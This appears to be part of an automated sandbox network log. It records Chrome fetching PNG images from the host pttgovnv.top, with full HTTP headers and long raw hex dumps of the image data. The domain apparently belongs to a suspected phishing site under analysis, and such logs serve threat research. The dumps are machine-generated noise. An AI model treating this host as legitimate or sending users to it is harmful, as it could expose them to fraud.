          2024-09-01 22:25:25 UTC1369INData Raw: 0d 70 8b a2 ea 75 10 e0 a0 85 ff 73 0a 46 19 e6 e6 cb da 69 e8 ae ac 5a 3b d6 6b a9 d5 98 b9 30 26 29 ec c0 10 fe ac 33 40 37 04 c4 ea 77 cd e2 98 b6 c3 18 0c 53 7a b9 7c 7d 7e f2 61 f9 3e d5 7b 52 cf 59 fc 4e 52 09 61 3a b4 ec 4e 32 3f 24 0f 0b b3 55 19 77 80 7b a7 0b 15 21 8e ae 05 56 08 4e c7 8d 66 44 85 2e d6 d0 ba 55 3d 28 df 5c fb 7f 57 2d 60 87 8d c2 5c f5 7b 8f 97 c7 52 b5 9a cd e2 b1 a5 ec ce 58 85 b9 b7 8d 8e eb 61 bb f8 df bf f7 17 39 7e f1 3f ff 73 ba 1f af a1 97 19 7e fd 5e f8 fd e5 b1 5b 34 95 31 06 b8 57 b1 52 0c 5b 49 77 6a 1f aa 10 13 82 d2 7f e3 d8 b6 59 ed f5 d7 aa 09 0b 21 68 85 ee d0 9b b6 e3 5a 85 b9 f3 d8 72 d7 e4 b8 ce 63 17 43 08 73 39 ba 5a db 1d 17 49 85 80 55 be c2 f7 fc bc c8 33 7b 79 ea 2c 23 c0 81 10 b7 cd a6 f1 01 fa 2c 86
          Data Ascii: pusFiZ;k0&)3@7wSz|}~a>{RYNRa:N2?$Uw{!VNfD.U=(\W-`\{RXa9~?s~^[41WR[IwjY!hZrcCs9ZIU3{y,#,
          2024-09-01 22:25:25 UTC1369INData Raw: 19 af f6 47 3d ac bd ce 4f e8 9e ac 5a e5 7e 2b 7e 1c 2b f7 fb e8 d7 58 eb 1e e4 de 8c 7d 3c c2 96 48 d1 b2 7b e1 34 0a 70 d9 02 5c 28 4b c6 1a e0 aa ae be e3 a2 db c4 ae 21 43 49 8a fb 7f 3f c1 79 9c dc 70 6d 85 5d 8a c6 d4 a2 f9 68 79 4c f9 c7 17 0a 71 1d 02 dc 34 86 b7 db 9a c3 bb d4 38 42 9f fe 74 59 5b fb fc e4 5b 1c 9f 70 b4 bc 20 ee ba 91 aa 25 46 c2 ff ff f1 86 da cb f9 d8 6a 06 89 83 dc dc 55 29 c4 31 ca f0 b2 df 5b 80 1b ef 39 58 cd c8 7c b1 a1 df e2 6a 05 84 ae e7 38 45 eb e3 4e cf 95 83 2e de 8f 25 c8 09 71 57 e1 6d 12 f7 31 bc 6f d6 4b fb 96 af aa 26 19 42 e0 aa eb 29 8c 4f 78 1d df f3 cf 18 ec 4e 63 0b db 6c 19 ce 56 b5 93 6a ac 5c 08 6b d7 77 4c 58 d5 0c 8e 46 dc 2a 77 58 b4 ef 6e 7b b6 91 2b 94 6f ce 75 df 65 11 e9 75 63 5f 16 66 31 e6 83
          Data Ascii: G=OZ~+~+X}<H{4p\(K!CI?ypm]hyLq48BtY[[p %FjU)1[9X|j8EN.%qWm1oK&B)OxNclVj\kwLXF*wXn{+oueuc_f1
          2024-09-01 22:25:25 UTC1369INData Raw: eb cb f4 33 6e 23 d4 da 9e 7e d9 2d aa 2e d6 cb b5 9a ea 9b 62 b5 1e dc 66 86 b9 a6 b5 3b 63 af c6 e3 a3 56 38 7a a9 28 0c b7 f8 6c 8e 07 72 3f a1 b4 ea 2e fc 9a e8 b7 bd 18 70 b1 f5 b3 ec e7 ac 0a 72 bf 8d f8 9a d9 be 10 17 c7 bd 85 00 f0 69 e0 1a 63 bf 83 6f 43 0d ee e9 97 10 d6 d6 5b e6 1e c5 10 7b 1e 5b e6 76 37 e6 8b ac 9a 9b 9b 8c df 38 f7 4c 1b 85 cb 62 33 d7 90 62 f3 54 8b cf 0e a5 1a ba 92 6a 6c f5 87 9e 27 9e cd 36 f6 59 b7 1e 86 fa 58 b2 a3 0a bd 29 17 53 7e dc 57 e5 63 a3 42 dc da 2c bb bf 8a 7e 56 cc be b7 86 92 bd 4b f5 e6 0b 6e d5 32 f7 bc a8 66 79 5e 16 57 2d 73 7f c5 6d b7 36 65 87 83 45 86 eb 64 56 90 f5 e1 30 e2 6d ac d8 3e 7b 71 79 8f 4d af a8 f7 bb 10 6c 35 ee 2e 55 6b dc 64 80 73 ff 76 83 43 6f 15 40 85 b8 ef 1e cc e1 84 9c 16 f9 56
          Data Ascii: 3n#~-.bf;cV8z(lr?.pricoC[{[v78Lb3bTjl'6YX)S~WcB,~VKn2fy^W-sm6eEdV0m>{qyMl5.UkdsvCo@V
          2024-09-01 22:25:25 UTC1369INData Raw: cc 30 65 e0 00 b7 da 99 25 fc dc a7 4c c7 f5 78 a4 f7 f5 36 e9 63 fd b6 71 94 55 d5 f5 2a c4 85 2e 9a 38 91 61 91 28 c8 85 b1 3b bd 0d bc 8e c7 7f d0 b2 e0 99 c7 ed b8 34 41 37 37 6b b2 62 77 cd ae d4 eb e1 7c 6c 85 fd 79 a2 f1 9c 30 ae 00 77 f5 60 0c 5b 1a b5 9d 34 56 c7 eb f2 f7 2f 7a da cd e1 a1 f9 3a f0 ae 13 dc 22 fb 98 b8 18 62 42 90 4b 31 75 78 b7 ef 50 14 5b d3 da 4c 93 5f d5 0c b9 df 64 ed df 3f c6 85 42 9b 68 1a c8 74 77 43 d3 0a 74 97 00 b7 5e 41 cb db ad 3a d7 ad 9a c5 d4 29 78 a0 21 2e 71 90 7b 19 17 07 ee 55 6c 21 69 b3 08 f0 6b bb 05 34 ac ed 35 2c 2c e2 f8 b6 26 93 15 2e 85 38 68 e4 d5 72 a9 90 14 aa 99 ac 39 5b c1 6d b5 97 e7 fb 5f 38 0d 0f 38 c4 6d 43 90 8b 41 a1 4d 0d f2 d8 4e 0e f7 da fd fb 1c df bf 5c c1 4d 35 c4 26 63 16 cd c4 84 66
          Data Ascii: 0e%Lx6cqU*.8a(;4A77kbw|ly0w`[4V/z:"bBK1uxP[L_d?BhtwCt^A:)x!.q{Ul!ik45,,&.8hr9[m_88mCAMN\M5&cf
          2024-09-01 22:25:25 UTC1369INData Raw: 7d 9c b8 36 ff 50 e5 3e 87 d5 6e 0e fd 5e 1b b3 51 9c d9 fa 01 ee 2a c8 0d d3 b5 1a be a3 83 9e ce c9 4e 86 ef 47 88 bb 23 1c 85 1b fc 79 87 da 5a a8 5d f4 d5 2a 17 6a 13 93 16 c7 1a 96 d1 38 7d a8 ad 72 2d 02 dc b4 60 cc 52 16 68 8f 8a 84 ad 67 71 08 44 ca f5 9c de 98 75 de d1 d3 2f 8b 8e 95 f5 5a df 53 8d ae c2 e3 22 dd d2 27 2f 07 1b b0 7f 15 56 42 39 f9 67 d1 7c dc d7 50 d7 f3 bc a7 ee dc 79 91 76 2c dc 59 ee 45 7e 37 36 c4 ad 15 bc 61 1f d2 f0 e5 be ea 70 93 f5 d5 2a 77 1a 8f b5 69 a1 14 6a f5 9f e2 ba 77 bb 02 dc 8d 7e 13 e0 1e 5c 88 5b 56 c4 12 4f 06 4a 7d 7c 73 eb 40 76 36 2b f2 2f 96 3a bf 27 4c 5e 24 be 36 8e 06 3b 9b 55 80 6b bb 57 f9 50 bd 42 8f 8a 76 3b 6e 34 39 2f e1 3a 7b d1 eb 75 25 c4 7d 17 90 c2 c9 0a 01 a7 ed 60 d8 bf 5b e5 72 77 5f 76
          Data Ascii: }6P>n^Q*NG#yZ]*j8}r-`RhgqDu/ZS"'/VB9g|Pyv,YE~76ap*wijw~\[VOJ}|s@v6+/:'L^$6;UkWPBv;n49/:{u%}`[rw_v
          2024-09-01 22:25:25 UTC1369INData Raw: 26 03 54 42 fa 2a 93 27 7d ae 75 b6 f6 dd 4e cb ef b6 d8 a0 20 f7 6e c8 00 17 fc 54 70 53 e1 7d 1c b7 72 fa b9 a8 b6 f5 aa b3 79 f7 e3 e2 6a 31 de a3 dc db 64 c5 ad bc 42 ab 55 78 9f 7f 15 d5 72 28 5f 37 e8 34 9f c5 73 bb 1b 66 fe 0a 70 0f ba f2 34 29 da ef 83 9c fb f8 0e 8b f6 bb c1 f4 17 6a d2 3a dd 80 4b e7 28 63 79 b7 53 f3 bc 5f 8c f9 da ed 18 e0 4e 07 bc 9e a7 35 9f b9 43 0b e3 27 07 df 91 45 88 bb a7 a5 20 d4 c6 cb d7 41 83 40 f7 28 d6 dc ff 8a 7b 9e 1e f4 70 9c eb 81 2e ec 5a f1 db 48 6f 82 b3 f8 40 fc 25 ec 5a 11 cf ad f0 e6 3e 3b 1d 79 90 9b c5 7b 7f cc 52 06 9a f3 d1 5f 34 55 80 3a 1c c5 71 54 e3 c6 3e 6c c1 ad 18 ee bf fd 41 03 dc 95 b1 07 b9 de d7 83 bb 8d ee d4 06 81 ae a8 ba 4b e7 71 2c cf aa cb 75 52 dc de 15 14 d6 a5 79 51 fe fd af ab 9f
          Data Ascii: &TB*'}uN nTpS}ryj1dBUxr(_74sfp4)j:K(cyS_N5C'E A@({p.ZHo@%Z>;y{R_4U:qT>lAKq,uRyQ
          2024-09-01 22:25:25 UTC516INData Raw: 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 9c 02 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10
          Data Ascii: !!@@@888!!!@@@888!!!@@@!!!@@@8888!!!@@@8888!!!@@@


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          67192.168.2.449810172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC599OUTGET /help/layout/images/41.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC722INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 19866
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"4d9a-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C5TBGw34g6bzxPI0qaIDCxbZT4kkC%2FQksuL6et8A0U3ochGpMGO6%2FOoGFVTlexcIZlBlP4M5oKHYPEGSJZnQfRWcgs9eigmf2VYHH2BJeKISA28a0pSBQFWIqbi6wMk%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad176bb41770-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC647INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 4d 27 49 44 41 54 78 da ec dd 0b 78 5c 77 79 e7 f1 d7 ba f8 ee 48 b6 e3 6b 8c 25 43 6e 84 8b 94 90 44 21 24 68 1c 42 bb 4d f2 60 65 cb 66 69 bb ac 65 fa 6c 16 b6 2d 56 ba ec b2 6c 21 1e 17 b6 2c 94 12 f9 d9 87 07 96 2d f5 b8 a5 5c d2 dd 46 ce 93 a4 40 21 1e 25 21 c5 04 92 31 21 21 24 21 1a d9 8e e3 bb 25 cb b2 25 df b4 e7 3d e7 3f d2 cc 68 24 cd 39 73 ce 99 33 d2 f7 f3 3c 27 8e 6e 33 67 ce 9c 99 f3 9b f7 7f 9b 35 32 32 22 00 00 00 a8 2c 55 1c 02 00 00 00 42 1c 00 00 00 08 71 00 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<M'IDATxx\wyHk%CnD!$hBM`efiel-Vl!,-\F@!%!1!!$!%%=?h$9s3<'n3g522",UBq
          2024-09-01 22:25:25 UTC1369INData Raw: c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 28 49 aa 25 61 6d cd 1c 08 00 00 fc 37 6b 64 64 84 a3 80 a0 42 5c a3 f5 df 1e 6b db 6a 6d 9d d2 bc bb 8f 83 32 33 d5 3f da 53 6f fd d3 66 6d 8d 51 39 3b ad 4d cf c7 54 df 9d eb fa 22 74 9c f4 18 15 fb c1 a7 cb da f7 54 44 9f 43 3d a6 c9 30 f7 0f 20 c4 01 fe 07 b9 b8 f5 df 2d d6 d6 6b 6d 09 c2 dc 8c 0c 70 ed f6 f3 2e 52 17 d1 5d ec d7 c0 91 d9 ca 11 3c ac 63 14 33 af 8f 06 97 7f ba c7 da da 83 de 67 6b ff 3a ac 7f e2 1e 9e c3 9d 66 ff 78 cd 03 84 38 54 68 90 d3 0b 4c 53 de 1b 7b 97 7d d1 6c de 9d e6 00 4d fb 00 b7 bd c2 76 bb d7 9c 9f 89 30 02 9d 09 70 bb 4a 0c a1 8d 41 05 25 13 e0 1e 28 e1 26 f6 58 fb 46 b7 0a 80 10 87 0a 0d 71 8d e2 34 5f d5 4d 70 c1 4c 99 2d 69 6d 69 82 dd b4 0a 71 7d 12 dd 0a 5c 31 ba
          Data Ascii: B!(I%am7kddB\kjm23?SofmQ9;MT"tTDC=0 -kmp.R]<c3gk:fx8ThLS{}lMv0pJA%(&XFq4_MpL-imiq}\1
          2024-09-01 22:25:25 UTC1369INData Raw: c4 21 1a 41 ae 5d 74 70 42 f1 7a 4d b0 13 73 d1 55 7d 66 eb 9c 24 c8 f5 db 17 13 a7 39 d6 eb be 36 9a 30 e7 77 bf b9 6e 13 32 d3 84 b8 f2 84 b8 80 82 5c bf b5 ef f5 21 84 38 b7 f4 35 d4 61 ed 5b 57 48 cf a1 97 d7 43 3c ac e7 1d a8 44 34 a7 22 1a 9c 50 b5 c9 c5 5f e8 20 86 56 b3 6d 31 db 03 26 08 d6 4d f2 77 75 e2 8c 64 6d 2f 61 5f d3 a6 df 9c df 7d a9 f4 b1 a4 4a da 37 94 cc 54 80 da c4 bf a9 67 ea ac 30 14 c5 fe 8f f6 7c 8b d6 be 45 b5 02 6c f7 1f 65 be 3d 80 10 87 e9 19 e4 4a b1 bd e4 81 05 c1 84 b9 4c c8 ec a2 af 5c 59 83 5c 5a fc 9d e7 ad 31 c2 0f 77 73 c4 97 09 eb 34 d5 51 00 84 38 4c 83 20 e7 57 85 24 e1 d3 3e 07 11 e6 36 88 36 e9 31 82 b5 9c 41 4e 2b 54 7e 0d 74 88 fa f3 d8 1e e1 7d ab 8b f8 fe 01 84 38 20 2f c8 dd 3d 49 58 4b 8b b3 da c2 26 13 9a
          Data Ascii: !A]tpBzMsU}f$960wn2\!85a[WHC<D4"P_ Vm1&Mwudm/a_}J7Tg0|Ele=JL\Y\Z1ws4Q8L W$>661AN+T~t}8 /=IXK&
          2024-09-01 22:25:25 UTC1369INData Raw: cc 4c 72 9b 5d 95 cb 0c 56 d8 66 3f d6 e8 37 9b 4e fe 18 9d 41 17 6e 2a 43 f5 d3 fc 34 de 65 9d 57 95 b6 cf 3b ac d7 41 9a 77 20 00 41 61 60 c3 f4 0e 6f 31 b3 54 d6 f6 b0 02 9c 11 fc 68 49 67 1a 92 46 19 bf 76 6a 66 0a 91 f6 0a 7f fa e8 0c 5f f9 e2 1c 02 00 84 38 b8 0d 6f ba 54 96 86 1c 9d ef ad b5 0c bb 10 0b e5 5e c6 d6 4e 5d 27 b9 6b 90 36 d8 c1 d5 59 7f 35 56 a1 4f 23 21 ae b2 6d a5 0a 07 80 10 07 b7 01 4e 3f fd eb c5 63 63 19 77 a3 c1 74 16 0f 87 36 3f 3a 6b 90 6a 98 d3 ca 5c 66 0e b9 56 71 9a 58 d3 15 57 99 73 9a 83 bb 39 a3 2b 92 ae df db c9 61 00 40 88 43 b1 e1 ad cd 2c 95 a5 1d e2 eb 22 b0 4b e1 87 26 27 cc 69 65 ae 51 9c a5 bb 32 21 28 53 99 d3 91 9f 89 0a 9a 53 cd 4d 35 2e 5d e4 79 d2 c1 ab 25 f8 73 9f 65 a2 00 84 81 81 0d 95 1f de 9a cd a7 fe
          Data Ascii: Lr]Vf?7NAn*C4eW;Aw Aa`o1ThIgFvjf_8oT^N]'k6Y5VO#!mN?ccwt6?:kj\fVqXWs9+a@C,"K&'ieQ2!(SSM5.]y%se
          2024-09-01 22:25:25 UTC1369INData Raw: f7 62 ee a6 0a d7 ce 3c 69 d3 42 23 87 00 20 c4 21 1a 41 ae cb 04 a2 de 12 83 dc 43 66 9a 89 b0 f6 3b e5 31 c8 e9 40 87 04 cf bc 2f dc 1c c7 1d 2c e8 0e 00 84 38 04 13 88 b4 49 74 67 89 37 b5 3d cc 80 54 42 90 db 48 90 2b 8d a9 bc 16 3b 22 55 fb 30 b2 96 6d 99 5f e6 3e de 56 10 dd 27 d2 3e 9e 9b 31 9e 6e 80 10 37 d3 82 9c 0e 78 d0 0b f3 d6 12 6f 4a 03 52 2a ac be 67 04 b9 b2 04 38 7d 6e 8b ed 43 a7 cf 0b cd a8 d1 f8 a0 36 23 42 9c d0 dc 0b 10 e2 66 f0 9b 7d dc fa 67 bd 94 d6 bc aa 7d cf d2 61 0d 78 20 c8 85 4e 03 5c b1 1d c8 3b 7c 0e 10 f0 ae df a7 db 09 e2 75 ed 67 c8 8f f1 54 03 84 b8 99 1c e4 92 52 7a f3 aa f6 93 7b 4e d7 2f 0d 39 c8 b9 9d 7e 44 83 5c 92 51 ab c5 31 cd a8 c5 0e 66 d8 c1 a4 be 91 e2 57 98 6e f2 7b 84 aa cf 41 9f 10 07 10 e2 66 7c 90 cb
          Data Ascii: b<iB# !ACf;1@/,8Itg7=TBH+;"U0m_>V'>1n7xoJR*g8}nC6#Bf}g}ax N\;|ugTRz{N/9~D\Q1fWn{Af|
          2024-09-01 22:25:25 UTC1369INData Raw: 33 33 22 34 96 b5 35 94 f1 b0 69 c5 cd 9e a5 be 12 e6 b0 23 c4 95 fd f5 d5 15 f4 f9 ea 25 c4 85 18 34 09 71 00 21 0e 21 05 a5 4c 53 e6 54 53 25 64 66 8c ef 2c 47 90 31 fd fd 9a 4d a0 d3 7f 75 df 83 a8 d6 69 a5 2d 2d 63 d3 9a a4 a6 f3 fa a6 84 b8 c0 ce d5 84 78 9b d3 31 d0 10 97 15 34 13 12 5c b5 9b 10 07 10 e2 50 86 0b 4f 2c 6b 6b 9a 22 e8 e8 45 a0 ec 4d 8a 26 88 66 6f 22 63 a3 4d 27 93 96 b1 11 ac 1a 4a fb e8 94 4f 88 f3 f9 d8 ba 59 92 2d b4 10 97 b5 7f 3a b8 48 43 bc df 55 39 42 1c 40 88 43 85 84 ba 3d 26 d0 75 4d 87 3e 62 33 f0 79 d6 e0 db e3 c3 4d 69 a5 b6 71 3a 57 2d 4b 0c ca 71 1f c3 9c 6f 21 c9 bc ce 3b cc e6 57 98 db 66 ed 5f 07 cf 3c 40 88 43 b4 2e 46 99 40 d7 6c b6 86 02 81 ae cb 04 ba 14 47 ac 62 9e 57 3f 3a bc 6f 65 f1 f3 a2 c2 9c 6e a5 ae f2
          Data Ascii: 33"45i#%4q!!LSTS%df,G1Mui--cx14\PO,kk"EM&fo"cM'JOY-:HCU9B@C=&uM>b3yMiq:W-Kqo!;Wf_<@C.F@lGbW?:oen
          2024-09-01 22:25:25 UTC1369INData Raw: 0c 6e 00 21 2e e2 9f 68 fd fe a4 55 3f 43 c2 db 84 1d aa 35 bc 7d e4 aa c5 ae fb b8 9d 3a 7b 51 92 fb 07 e5 f9 be 21 d9 7b fa 9c f4 58 5f ff e4 cc 39 59 59 53 65 87 ad da 59 22 ef 98 5d 2d 7f 76 e5 52 d9 73 fc b4 dc b4 7c 81 dc bc 7a be bc 7c e2 ac 5c b9 78 76 d1 f7 a3 55 c0 8f 5c b3 44 ee b9 bc 7e a2 30 a7 15 8e 36 1d 94 11 e9 fe 72 51 bf 10 e9 6b ab 79 77 92 37 99 c8 06 fc 58 c5 3e fa a9 cf 2d bf ce f9 26 4e 35 10 e2 66 96 d6 e9 fe 00 4d f5 4d fb 9b e4 34 9b ea c8 d2 ff 70 c5 e2 a2 2b 6f 1a da 1e 4b 0f c8 ae c3 83 72 e0 dc 45 f9 d9 f0 05 19 bc 30 7e 20 42 26 60 d5 cc 9a 25 77 2c 9d 27 c7 86 ce cb 09 eb 6f 3f f2 fc 11 39 9a ba 28 d5 e6 f7 ae b6 02 de 65 56 e0 bb b1 7e 8e dc d5 50 27 97 4f 11 ec f2 c3 dc 9f f6 f4 e7 7f da d7 26 d6 6d 56 90 ab f4 29 33 ea
          Data Ascii: n!.hU?C5}:{Q!{X_9YYSeY"]-vRs|z|\xvU\D~06rQkyw7X>-&N5fMM4p+oKrE0~ B&`%w,'o?9(eV~P'O&mV)3
          2024-09-01 22:25:25 UTC1369INData Raw: 97 ac 20 fa 1f 5f 3e 2e 9f b7 6e 23 9f 36 21 17 08 72 db 43 0a 72 71 d1 75 79 a7 ae ca 69 a7 ef f5 d6 ef 77 f8 70 9f 7a 1e 34 9a 00 d9 3f 45 85 44 d7 98 e4 22 0b ce 2d cc 58 b3 46 46 46 38 0a 61 73 56 6c d8 e5 f3 1b d4 ac 0a 0e 71 49 c9 9a b0 78 a2 00 a7 55 b2 7b ac 00 97 df f7 4d fb a0 6d 7b cb 62 7b 84 e7 9e 23 43 72 fb 33 6f c8 62 2b c8 69 ec d1 69 44 74 fa 0f ed 17 a7 df 7b 76 fd 9b ec aa d9 1f 5b b7 f3 fc d0 79 3b e0 a5 cf 5d 10 ed 6d 77 c2 7a 29 fc ee a2 5a 59 31 af 56 ea 6b ab e4 63 ef 58 3a e1 3e eb 88 d6 a6 27 f6 d9 ff df 58 5b 6d 85 c0 91 29 ab 82 c5 d0 c9 8b 75 ca 91 7c cf 1e 3a 23 b7 fd 2c a7 e9 55 2f 42 b1 be 3b d7 a5 42 3e 6f 1b cd a6 17 b7 94 bd 05 79 a1 73 d6 be d4 fb cb cc 53 a6 e7 4a 9a e9 1e 42 7f cf d2 40 bf c5 a7 5b 5b 1f 89 55 35 fc
          Data Ascii: _>.n#6!rCrquyiwpz4?ED"-XFFF8asVlqIxU{Mm{b{#Cr3ob+iiDt{v[y;]mwz)ZY1VkcX:>'X[m)u|:#,U/B;B>oysSJB@[[U5
          2024-09-01 22:25:25 UTC1369INData Raw: 43 81 1d 3c ed 1f a8 73 e5 3d 76 db 9a d1 ef 69 b3 aa 4e b3 a2 21 2f 73 58 75 ee 3d df e6 8e 4b b5 68 65 af dd 6c 4d 05 7e ae 93 e3 25 c4 db a2 f7 93 dd 6f bb 09 a4 13 dd 67 97 b9 cf 74 44 2e 7c cd 66 6b 34 ff d6 15 f9 b7 99 ff d3 55 02 f4 f8 25 45 27 9c 75 2e a0 29 de 32 02 79 be 2a e7 dc 0a e7 78 b4 99 e3 d1 5a e0 67 7b cc b1 48 70 e2 44 13 2b 36 94 ef 4d 7f 46 ad d8 60 aa 70 3d 99 af 27 5a 95 41 a7 f0 78 7c 92 7e 65 1a ca 32 4b 66 a9 4f ae 5a 38 3a 4f 5c 86 2e 83 f5 e9 17 8f ca 9f be 79 b1 dd 6f 2d 7f d4 ab 17 da 27 ed ef 7e 7d 42 2e 5b 30 5b 3e f0 e6 f1 83 30 de ff c3 bd 72 fc a2 3f ab 36 4c e5 de a5 f3 e4 8b 37 8d cd a7 a7 01 f2 9a ee 7d d9 bf b2 d5 0a 71 71 1f ce d3 66 73 41 6b 28 e2 b7 fb ed a0 e7 2c 6d 54 6a 68 ec 2a 78 41 29 7c 9f 1d a1 5f 60 9c
          Data Ascii: C<s=viN!/sXu=KhelM~%ogtD.|fk4U%E'u.)2y*xZg{HpD+6MF`p='ZAx|~e2KfOZ8:O\.yo-'~}B.[0[>0r?6L7}qqfsAk(,mTjh*xA)|_`
          2024-09-01 22:25:25 UTC1369INData Raw: 42 1c 2a 4d 7e 53 ea ad 2b e7 47 6a ff 1e 79 6d 40 ee eb e9 93 7f e8 19 ab 66 bd 68 26 cd bd 6a f6 58 b3 e4 9a 9a 2a 7b 95 84 b6 15 0b ec be 68 7d 11 aa c8 69 93 6a f6 ba aa da df 50 d7 82 8d 40 05 a1 3c 21 c2 6b a7 6b a7 cf d3 e6 69 f2 d2 9b ce 41 ae 7c 13 20 57 5a 87 7e ef 53 f6 4c 85 11 aa 84 38 cc b4 4f c1 3a 28 40 fb 6c 45 c9 0f cd bc 6a 6f 59 38 d6 17 4f 27 d1 fd db b7 5e 2a ef bb 64 ce e8 f7 3e d9 58 ef 4c f6 7b 60 20 72 07 58 9b 54 ff fa c5 63 39 df 6b 59 9c 73 9c cb d5 97 a7 a9 62 ce 52 67 10 46 e7 34 7b ed e9 f1 8f 17 f1 7b 3b 2b e8 31 f5 32 47 59 d9 03 1c 21 8e 10 87 99 18 e2 3e 50 37 37 12 3b a4 61 4c 57 57 a8 7f b4 47 5e 1b 3a 6f 7f ef d8 f0 f9 9c df 79 e4 f5 01 f9 bb 13 43 f6 84 c3 da 74 aa 53 91 1c 18 3c 2f cf 0e 5f 88 e4 41 7e 63 38 b7 32
          Data Ascii: B*M~S+Gjym@fh&jX*{h}ijP@<!kkiA| WZ~SL8O:(@lEjoY8O'^*d>XL{` rXTc9kYsbRgF4{{;+12GY!>P77;aLWWG^:oyCtS</_A~c82


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          68192.168.2.449811104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC361OUTGET /help/layout/images/34.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:25 UTC722INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:25 GMT
          Content-Type: image/png
          Content-Length: 14568
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"38e8-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36234
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o8cBJQCEWZAnK2o87FFYiRXhpl0T00LOKXCZTLH7Zdf0tU%2BhGMPsKGIJoSSwDW5hCi%2BSItfRwY8qcsc5ytqEYOgjiOEUeZOatKnzirSf7rVqUCSayRvBCjlwnuTwDAg%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad17793c43ef-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:25 UTC647INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 38 75 49 44 41 54 78 da ec dd 3d 56 1b c9 de c7 f1 f2 3d 73 ce 84 f0 ac 00 4d 44 88 26 22 a4 bd 02 34 e1 8d 90 57 80 bc 02 e4 15 58 ac 00 11 39 b4 58 81 45 48 64 11 12 59 ac 60 50 78 23 9e fe 77 55 1b 59 06 a9 5f aa aa ab ba bf 9f 73 34 9e 19 83 d4 2a 75 ab 7e 5d af ef 9e 9f 9f 15 00 00 00 e2 f2 1f 8a 00 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10
